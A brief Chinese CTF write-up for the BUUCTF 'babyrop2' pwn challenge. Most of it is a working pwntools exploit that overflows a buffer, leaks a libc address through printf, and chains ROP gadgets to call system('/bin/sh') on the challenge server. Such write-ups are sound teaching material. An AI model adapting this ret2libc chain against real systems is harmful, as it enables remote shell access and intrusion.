BUUCTF HarekazeCTF2019 babyrop2

mac2025-05-05  6

这道题是用 printf 泄露已经调用过的函数地址来确定 libc 版本，然后用 ROP getshell（这里有格式化字符串，没有的话可以先 read 一个再泄露，反正栈空间够长）。exp:

#coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./babyrop2') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') def debug(): gdb.attach(p) p.recvuntil('name? ') pop_rdi=0x00400733 pop_rsi_r15=0x000400731 main_addr=0x400636 form_str=0x00400770 pd='a'*0x20+'aaaaaaaa' #pd+=p64(pop_rdi)+p64(elf.got['printf'])+p64(elf.plt['printf'])+p64(0x0400636) pd+=p64(pop_rdi)+p64(form_str)+p64(pop_rsi_r15)+p64(elf.got['read'])+p64(0)+p64(elf.plt['printf'])+p64(main_addr) #gdb.attach(p,'b*0x04006CA') p.sendline(pd) read_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) #libc=LibcSearcher('read',read_addr) libcbase=read_addr-libc.symbols['read'] system_addr=libcbase+libc.symbols['system'] bin_sh=libcbase+libc.search('/bin/sh').next() p.recvuntil('name? ') pd='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) p.sendline(pd) p.interactive()